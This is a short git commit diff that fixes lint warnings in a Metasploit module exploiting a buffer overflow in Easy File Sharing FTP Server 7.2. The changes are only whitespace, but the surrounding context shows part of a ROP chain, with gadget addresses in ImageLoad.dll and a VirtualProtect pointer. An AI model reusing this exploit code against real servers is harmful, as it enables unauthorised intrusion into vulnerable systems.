corrected msftidy warnings
parent
31a5cc94b2
commit
7fb36edd50
|
@ -16,11 +16,11 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Description' => %q{
|
||||
This module exploits a POST buffer overflow in the Easy File Sharing FTP Server 7.2 software.
|
||||
},
|
||||
'Author' =>
|
||||
'Author' =>
|
||||
[
|
||||
'bl4ck h4ck3r', #POC
|
||||
'Marco Rivoli <marco.rivoli.nvh[at]gmail.com>' #Metasploit
|
||||
],
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'References' =>
|
||||
[
|
||||
|
@ -57,7 +57,6 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
0x1001a858, # RETN (ROP NOP) [ImageLoad.dll]
|
||||
0x10015442, # POP EAX # RETN [ImageLoad.dll]
|
||||
0x1004de84, # &Writable location [ImageLoad.dll]
|
||||
|
||||
0x10015442, # POP EAX # RETN [ImageLoad.dll]
|
||||
0x61c832d0, # ptr to &VirtualProtect() [IAT sqlite3.dll]
|
||||
0x1002248c, # MOV EAX,DWORD PTR DS:[EAX] # RETN [ImageLoad.dll]
|
||||
|
|
Loading…
Reference in New Issue